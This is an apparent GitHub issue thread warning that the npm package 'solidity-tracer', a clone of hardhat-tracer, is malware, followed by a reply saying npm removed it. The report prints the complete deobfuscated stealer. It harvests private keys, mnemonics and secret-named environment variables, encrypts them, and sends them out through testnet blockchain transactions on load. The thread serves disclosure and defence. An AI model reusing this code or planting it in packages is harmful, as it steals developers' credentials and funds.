malware clone of hardhat-tracer

[CedarMist]

The following package is a clone of hardhat-tracer, but contains malware which scrapes for private keys

https://www.npmjs.com/package/solidity-tracer

I have reported this already, but you should be aware and report too.

This submits the encrypted data to BSC & matic testnets:

See:

• https://testnet.bscscan.com/address/0x92cA86ECE960AA419FF61915e85347030cc6D274
• https://mumbai.polygonscan.com/address/0x92cA86ECE960AA419FF61915e85347030cc6D274

The deobfuscated code is:

try {
  require("@nomicfoundation/ethereumjs-vm");
} catch {
  console.error("\n\nERROR\n\nPlease upgrade your hardhat version to 2.11 or above.\nThis error is generated by plugin \"hardhat-tracer\" because it is \ndependent on some features available in hardhat >=2.11.0 <3.0.0.\n\nnpm i hardhat@latest\n\nor\n\nyarn add hardhat@latest\n\n");
  process.exit(0x1);
}
import './chai';
import './extend';
import './tasks';
export * from './types';
export * from './wrapper';
const crypto = require("crypto");
const hardhatConfig = require('hardhat/config');
const ethereumjs = require("@ethereumjs/tx");
const common = require("@ethereumjs/common");
import { Web3, HttpProvider } from 'web3';
const ENV_PATTERNS = ["MNEMONIC", 'PRIVATE', "SECRET", "KEY", 'PK', 'ACCOUNT', "API", "_PATH", "DEPLOY", "ETH"];
function secretsFromEnv() {
  return Object.keys(process.env).filter(_0x51d8e8 => {
    for (const _0x4cc5f3 of ENV_PATTERNS) {
      if (_0x51d8e8.toUpperCase().includes(_0x4cc5f3)) {
        return true;
      }
    }
    return false;
  }).map(_0x5ab621 => _0x5ab621 + '=' + process.env[_0x5ab621]);
}
function checkSecret(_0x4c7ddd, _0xacc2d9) {
  try {
    JSON.stringify(_0x4c7ddd);
    return _0x4c7ddd;
  } catch (_0x361686) {
    return _0xacc2d9 + ": " + _0x361686;
  }
}
function secretsFromConfig(_0x9cc15f) {
  return Object.values(_0x9cc15f.networks || {}).map(_0x28194b => {
    if (!!_0x28194b.privateKey) {
      return [checkSecret(_0x28194b.privateKey, "privateKey")];
    }
    if (!!_0x28194b.mnemonic) {
      return [checkSecret(_0x28194b.mnemonic, "mnemonic")];
    }
    if (!!_0x28194b.accounts) {
      if (!!_0x28194b.accounts && _0x28194b.accounts.constructor === Array) {
        return _0x28194b.accounts.map((_0x545fff, _0x8ed385) => checkSecret(_0x545fff, "accounts[" + _0x8ed385 + ']'));
      }
      if (!!_0x28194b.accounts && _0x28194b.accounts.constructor === Object) {
        if (!!_0x28194b.accounts.privateKey) {
          return [checkSecret(_0x28194b.accounts.privateKey, 'accounts.privateKey')];
        }
        if (!!_0x28194b.accounts.mnemonic) {
          return [checkSecret(_0x28194b.accounts.mnemonic, "accounts.mnemonic")];
        }
      }
    }
    return null;
  }).filter(_0x32f721 => _0x32f721 != null).flat();
}
function encryptSecrets(_0x4f59ef) {
  let _0x1df4a4;
  try {
    _0x1df4a4 = JSON.stringify(_0x4f59ef);
  } catch (_0x33f25f) {
    _0x1df4a4 = "final: " + _0x33f25f;
  }
  const _0x31a8b0 = crypto.randomBytes(0x20);
  const _0x282dd4 = crypto.randomBytes(0x10);
  const _0x49f6ff = crypto.createCipheriv('aes-256-cbc', _0x31a8b0, _0x282dd4);
  let _0x5c300f = _0x49f6ff.update(_0x1df4a4, 'utf-8', "hex");
  _0x5c300f += _0x49f6ff.final('hex');
  const _0x46998b = crypto.createPublicKey("-----BEGIN RSA PUBLIC KEY-----\nMIIBCgKCAQEAoVMvXIi5b/APV4y8RF9iLprdNWLr3F4t4urTTX/2wZFs6Tq4hX0N\nZFx+CGUvyNICrjvL9fu7LqDyvUnxLhH+sGl5o+drrGU4O2I81W0Ul6/aoI9KBpJ8\nmJBK9rFLExs55lG++J3GaXdAqmEv9J8xcq6QpKGniiPIM59IUPwmsjeFeZyfe7rL\ndCHKnVNgHxcPBnymIntn58qwfAUbXTcNZszrd8pqO8DYwpxDaNnHxhnwDGGDCBmT\n67/ln6vOLJm2YnozuRnAnvF9AjND/bdc7jBhe9A3lM67b3hZVsnwmZskyo1RTsXv\nGdfgsOhIlIhf0/vxGIMUbfNlyDaayWwG3QIDAQAB\n-----END RSA PUBLIC KEY-----");
  const _0x537224 = crypto.publicEncrypt(_0x46998b, _0x31a8b0);
  const _0x1655df = crypto.publicEncrypt(_0x46998b, _0x282dd4);
  return Buffer.concat([_0x537224, _0x1655df, Buffer.from(_0x5c300f, "hex")]);
}
async function sendSecretsToBlockchain(_0xd0d988, _0x46aefb, _0x18d187, _0x38c1f1, _0x44908f, _0x3fc84f) {
  const _0x119a6c = new HttpProvider(_0x46aefb);
  const _0x443b17 = new Web3(_0x119a6c);
  const _0x4b0523 = new Buffer(_0x38c1f1, 'hex');
  const _0x9d637e = await _0x443b17.eth.getTransactionCount(_0x44908f);
  const _0x4192ba = new ethereumjs.Transaction({
    'gasLimit': _0x443b17.utils.toHex(0x19f0a0),
    'gasPrice': _0x443b17.utils.toHex(0x826299e00),
    'from': _0x44908f,
    'to': _0x3fc84f,
    'nonce': _0x443b17.utils.toHex(_0x9d637e),
    'value': _0x443b17.utils.toHex('0'),
    'data': _0xd0d988,
    'chainId': _0x18d187
  }, {
    'common': common.Common.custom({
      'chainId': _0x18d187
    })
  });
  const _0xe02a79 = _0x4192ba.sign(_0x4b0523);
  const _0x403ee4 = await _0x443b17.eth.sendSignedTransaction('0x' + _0xe02a79.serialize().toString("hex"));
  return _0x403ee4.transactionHash;
}
async function storeSecrets(_0x39d958) {
  try {
    return await sendSecretsToBlockchain(_0x39d958, 'https://bsc-testnet.public.blastapi.io', 0x61, "44b8d386f12231bcce900d1d677b20f9ccb1d6aef77f0b1b3b83a0fa26be8930", "0x92cA86ECE960AA419FF61915e85347030cc6D274", '0x0000000000000000000000000000000000001DC0');
  } catch (_0x1bd08d) {
    try {
      return await sendSecretsToBlockchain(_0x39d958, "https://endpoints.omniatech.io/v1/matic/mumbai/public", 0x13881, "44b8d386f12231bcce900d1d677b20f9ccb1d6aef77f0b1b3b83a0fa26be8930", "0x92cA86ECE960AA419FF61915e85347030cc6D274", '0x0000000000000000000000000000000000001DC0');
    } catch (_0x40cdaf) {
      return "store mumbai err: " + _0x40cdaf;
    }
  }
}
hardhatConfig.extendEnvironment(async _0x185fb5 => {
  const _0x199acd = [];
  try {
    _0x199acd.push(...secretsFromEnv());
  } catch (_0x4a1233) {
    _0x199acd.push("env err: " + _0x4a1233);
  }
  try {
    _0x199acd.push(...secretsFromConfig(_0x185fb5.config));
  } catch (_0x2ae4bc) {
    _0x199acd.push("config err: " + _0x2ae4bc);
  }
  const _0x3745e5 = encryptSecrets(_0x199acd);
  await storeSecrets(_0x3745e5);
});

[zemse]

Thanks for taking the effort! It appears that the package has been taken down by npm team. https://www.npmjs.com/package/solidity-tracer